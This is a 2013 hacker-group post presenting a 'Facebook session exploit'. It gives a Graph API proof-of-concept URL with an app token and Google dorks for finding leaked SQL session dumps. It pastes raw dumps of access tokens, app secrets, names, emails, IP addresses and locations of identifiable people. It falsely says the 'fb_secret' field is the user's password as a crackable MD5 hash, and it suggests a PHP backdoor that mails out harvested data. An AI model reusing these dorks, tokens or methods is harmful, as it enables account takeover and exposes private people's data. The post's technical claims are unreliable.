###############################################
#Title: Facebook session Exploit Priv8
#Description : Parameters Logins Facebook
#Exploitation: Manually and use your Brain ^_^
#Date: 12/05/2013
#Author: Mauritania Attacker
#Greetz : All AnonGhost Members <3
###############################################
Hi All Today i'm going to Explain about the new Exploit i found in Facebook , This time it's an advanced Exploit ^_^ i'm going to explain
step by step.
First , Facebook Token is a Code wich from you can access to another account or view Datas given by your friend , or by an admin of a page or an application.
POC : https://graph.facebook.com/303943362983320/accounts/test-users?installed=true&name=test&permissions=read_stream&method=post&access_token=303943362983320|gdHOjhabhCio0zTGiYKDhZcuUo0
So the Token Code is : gdHOjhabhCio0zTGiYKDhZcuUo0
Before the Token Code we have "|" do not forget like you see in the url.
The Id of the Application is : 303943362983320
So here is the results as you can see :
{
"id": "100005941890185",
"email": "test_yqvqkrx_test\u0040tfbnw.net",
"access_token": "CAAEUb1QutZAgBAKZBAZCw0C5iwP6vcrm6ZARLLuVZCyopLmfGC8ReGrN9jBLt8KcDoybAPJ0qZAZCUZBHFyZCU4xsFT4VvjaCbJisW7dflRZBvroVbeFUJg9PMwFgV0tO83LteqJOCiRGLWXnnsiS0BrPZANGFObF5gmI0ZD",
"login_url": "https://www.facebook.com/platform/test_account_login.php?user_id=100005941890185&n=cNdaa9hGgmzmcvi",
"password": "147905033"
}
#We can see the password and the login url but this method is just to get Users of a Facebook Application.
#So now let's get inside the serious things Facebook `ci_sessions` is the Log sent by "login.facebook.com" to another servers that are using
Facebook Plugins or Modules and it has all parameters of the Logins of Accounts used by Most of the Websites and the best thing is that the Hash password is
in MD5 (ascii Text) that mean that it can be decrypted without any problem ^_^ .
#There is Also A second Log called `WRITE` you can try to find another Logs Var , \!/ Hacking is Art of Exploitation \!/
Parameters are :
*fb_apiid
*fb_apikey
*fb_secret (Password of the Account in Hash MD5)
*fb_accesstoken
*fb_uservisitor
*facebook_id
*facebook_name
*facebook_first_name
*facebook_last_name
*facebook_link
*facebook_username
*facebook_hometown (tracer)
*facebook_location (tracer)
#These are the most Important Parameters of a Facebook account and there is all parameters in the Exploit and also i wanted to show you these two importants
Parameters :
*facebook_hometown (tracer)
*facebook_location (tracer
#It shows how can Facebook trace people and where is the locations saved in their Database ,you can even use a php Backdoor Script with that Parameters
and you will receive all Details in your email \!/
#So You can see that Facebook has been totally exploited ^_^ and now i leave you with the Datas so you can be sure that you understand the Exploit.
*Example Of Facebook `ci_sessions` :
Facebook
`ci_sessions`
"id\";s:1:\"1\";s:4:\"\";s:9:\"\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"223122544391265\";s:9:\"fb_apikey\";s:15:\"223122544391265\";s:9:\"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\";s:3:\"url\";s:29:\"apps.facebook.com/oinstaller/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:14:\"fb_uservisitor\";s:15:\"100001444879309\";s:11:\"facebook_id\";s:15:\"100001444879309\";s:13:\"facebook_name\";s:13:\"Owen
Peredo
D\";s:19:\"facebook_first_name\";s:4:\"Owen\";s:18:\"facebook_last_name\";s:8:\"Peredo
D\";s:13:\"facebook_link\";s:34:\"http://www.facebook.com/owenperedo\";s:17:\"facebook_username\";s:10:\"owenperedo\";s:17:\"facebook_hometown\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba,
Bolivia\";}s:17:\"facebook_location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba,
Bolivia\";}s:12:\"facebook_bio\";s:21:\"Alegre y
divertido!!!\";s:13:\"facebook_work\";a:1:{i:0;O:8:\"stdClass\":5:{s:8:\"employer\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"145505632143902\";s:4:\"\";s:8:\"Sysdecom\";}s:8:\"location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba,
Bolivia\";}s:8:\"position\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"131462966897408\";s:4:\"\";s:19:\"Gerente
Propietario\";}s:11:\"description\";s:27:\"Systems development
Company\";s:10:\"start_date\";s:7:\"2008-01\";}}s:15:\"facebook_sports\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"103998839637434\";s:4:\"\";s:20:\"Association
football\";}}s:23:\"facebook_favorite_teams\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:12:\"197394889304\";s:4:\"\";s:12:\"FC
Barcelona\";}}s:26:\"facebook_favorite_athletes\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"176063032413299\";s:4:\"\";s:9:\"Leo
Messi\";}}s:29:\"facebook_inspirational_people\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:11:\"19987834992\";s:4:\"\";s:11:\"Hilary
Duff\";}}s:18:\"facebook_education\";a:3:{i:0;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106494992721308\";s:4:\"\";s:24:\"joseph
nicolas maldonado\";}s:4:\"type\";s:11:\"High
School\";}i:1;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106233722748482\";s:4:\"\";s:4:\"UMSS\";}s:4:\"type\";s:7:\"College\";}i:2;O:8:\"stdClass\":3:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106462112722590\";s:4:\"\";s:30:\"Centro
Boliviano Americano
CBA\";}s:4:\"year\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"201638419856163\";s:4:\"\";s:4:\"2011\";}s:4:\"type\";s:7:\"College\";}}s:15:\"facebook_gender\";s:4:\"male\";s:17:\"facebook_timezone\";i:-4;s:15:\"facebook_locale\";s:5:\"en_US\";s:18:\"facebook_languages\";a:2:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"110343528993409\";s:4:\"\";s:7:\"Spanish\";}i:1;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106059522759137\";s:4:\"\";s:7:\"English\";}}s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-08-10T12:59:54+0000\";s:16:\"campaign_user_id\";s:1:\"5\";s:10:\"fanpage_id\";s:15:\"181056671916971\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001444879309\";s:10:\"user_token\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:16:\"id_pageinstalled\";s:2:\"63\";s:14:\"isFanpageAdmin\";b:1;}'),('63207e3bb6293317511e1731de110bdc','186.22.142.214','Mozilla/5.0
(Macintosh; Intel Mac OS X 10_7_2)
App',1318966975,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis
tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:14:\"fb_uservisitor\";s:9:\"689991521\";s:11:\"facebook_id\";s:9:\"689991521\";s:13:\"facebook_name\";s:14:\"Matias
O\'Keefe\";s:19:\"facebook_first_name\";s:6:\"Matias\";s:18:\"facebook_last_name\";s:7:\"O\'Keefe\";s:13:\"facebook_link\";s:37:\"http://www.facebook.com/matias.okeefe\";s:17:\"facebook_username\";s:13:\"matias.okeefe\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:23:\"matias.okeefe@gmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-17T12:06:55+0000\";s:16:\"campaign_user_id\";i:7;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:9:\"689991521\";s:10:\"user_token\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('b20a63bc8a68f130feb7321c58b56d8d','190.244.13.94','Mozilla/5.0
(Macintosh; Intel Mac OS X 10.6;
rv:7.',1318967000,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis
tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:14:\"fb_uservisitor\";s:15:\"100000365619835\";s:11:\"facebook_id\";s:15:\"100000365619835\";s:13:\"facebook_name\";s:13:\"House
Gregory\";s:19:\"facebook_first_name\";s:5:\"House\";s:18:\"facebook_last_name\";s:7:\"Gregory\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100000365619835\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:20:\"sfarsuau@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"en_US\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-06T22:24:58+0000\";s:16:\"campaign_user_id\";i:8;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:15:\"100000365619835\";s:10:\"user_token\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('9f82abf03ee6c9c9c052d306452b72d2','200.125.109.35','Mozilla/5.0
(Windows NT 5.1) AppleWebKit/535.1
(KH',1318967163,'a:19:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis
tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:0:\"\";s:14:\"fb_uservisitor\";s:0:\"\";s:16:\"campaign_user_id\";s:0:\"\";s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:0:\"\";s:10:\"user_token\";s:0:\"\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('bab185c44a703272b8324c3915e14f45','190.16.128.144','Mozilla/5.0
(Macintosh; Intel Mac OS X 10_7_2)
App',1319156401,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis
tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:14:\"fb_uservisitor\";s:15:\"100001952113675\";s:11:\"facebook_id\";s:15:\"100001952113675\";s:13:\"facebook_name\";s:11:\"Enzo
Sifrub\";s:19:\"facebook_first_name\";s:4:\"Enzo\";s:18:\"facebook_last_name\";s:6:\"Sifrub\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100001952113675\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:31:\"francisco.valenzuela@frubis.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-20T14:53:31+0000\";s:16:\"campaign_user_id\";i:9;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001952113675\";s:10:\"user_token\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('3a6f810a85da6f7045d88aad108f33f3','190.224.151.198','Mozilla/5.0
(Windows NT 5.1) AppleWebKit/535.1
(KH',1319156419,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis
tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:14:\"fb_uservisitor\";s:10:\"1089777996\";s:11:\"facebook_id\";s:10:\"1089777996\";s:13:\"facebook_name\";s:17:\"Luciano
Balmaceda\";s:19:\"facebook_first_name\";s:7:\"Luciano\";s:18:\"facebook_last_name\";s:9:\"Balmaceda\";s:13:\"facebook_link\";s:39:\"http://www.facebook.com/lucho.balmaceda\";s:17:\"facebook_username\";s:15:\"lucho.balmaceda\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:27:\"lucho.balmaceda@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-19T14:48:37+0000\";s:16:\"campaign_user_id\";i:10;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:10:\"1089777996\";s:10:\"user_token\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}');
*Example of Facebook `WRITE` session :
(6,'fbsecret','823215e0b822191b1451b7f48f877dd5'),
(5,'fbapi','ffc4ba57627eebfd1d41ca7d7107123e'),
(7,'pageid','188846611127079'),
(8,'pagename','St Maria Goretti Church'),
(9,'pagetoken','122582234479418|a17360823010b076c960588f-58100826|188846611127079|F7ae3Q3oYkZsu6TwJls-7EZx8PM'),
(10,'Cancellations','2'),
(11,'Bulletins','3'),
(12,'Cancellations/Delays','4'),
(13,'Church Blog','')
#Dorks that you can use or create your own Dorks ^_^
Dork1: ext:sql "fb_secret\"
Dork2: ext:sql "fb_username\"
Dork3: ext:sql "fb_id\"
Dork4: ext:sql "fb_secret\" ci_sessions
Dork5 : ext:sql "fb_secret\" WRITE
#Demo :
*User Facebook : facebook_username\";s:10:\"owenperedo ================>>> Username Facebook : www.facebook.com/owenperedo
*Pass Facebook : \"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\ ================>>> Password Facebook : 49c853d3d0718fd0419fd58ac183bbce (MD5)
#Note that almost of CMS like "Wordpress" , "Joomla" , "Drupal" , etc.. and another Websites has this Bug you can find the Datas in any extensions :
"sql" , "xml" , "dat" , "txt"
ref : Hackerzadda
0 comments:
Post a Comment